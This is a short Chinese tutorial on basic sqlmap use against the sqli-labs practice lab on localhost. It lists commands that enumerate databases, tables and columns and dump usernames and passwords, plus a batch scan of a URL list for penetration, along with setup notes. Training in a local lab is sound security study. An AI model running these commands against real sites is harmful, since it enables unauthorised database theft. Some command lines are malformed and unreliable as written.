漏洞利用SQL注入及sqlmap基础使用
sqlmap下载
sqlmap
可以在Linux里使用,也可以在Windows里使用
使用的前提是要有python环境
sqlmap注入语句
语句 | 目的 |
---|---|
sqlmap -u “http://localhost/sqli-labs/Less-1/?id=1” --current-db | 获取当前数据库名 |
sqlmap -u “http://localhost/sqli-labs/Less-1/?id=1” --level=5 --risk=3–dbs | 获取该数据库的全部数据库名 |
sqlmap -u “http://localhost/sqli-labs/Less-1/?id=1” --level=5 --risk=3–dbms=mysql -D “security” --tables | 获取指定数据库下的全部数据表名 |
sqlmap -u “http://localhost/sqli-labs/Less-1/?id=1” --level=5 --risk=3–dbms=mysql -D “security” -T “users” --col | 获取指定数据库的数据表的数据列名 |
sqlmap -u “http://localhost/sqli-labs/Less-1/?id=1” --level=5 --risk=3–dbms=mysql -D “security” -T “users” -C “password,username” --dump | 获取指定数据库的数据表的数据列的字段 |
sqlmap half.txt --batch | 批量扫描half.txt里需要渗透的URL |
sql-las下载
我下载的是支持PHP7,需要请私信
部署数据库
记得添加密码,否则失败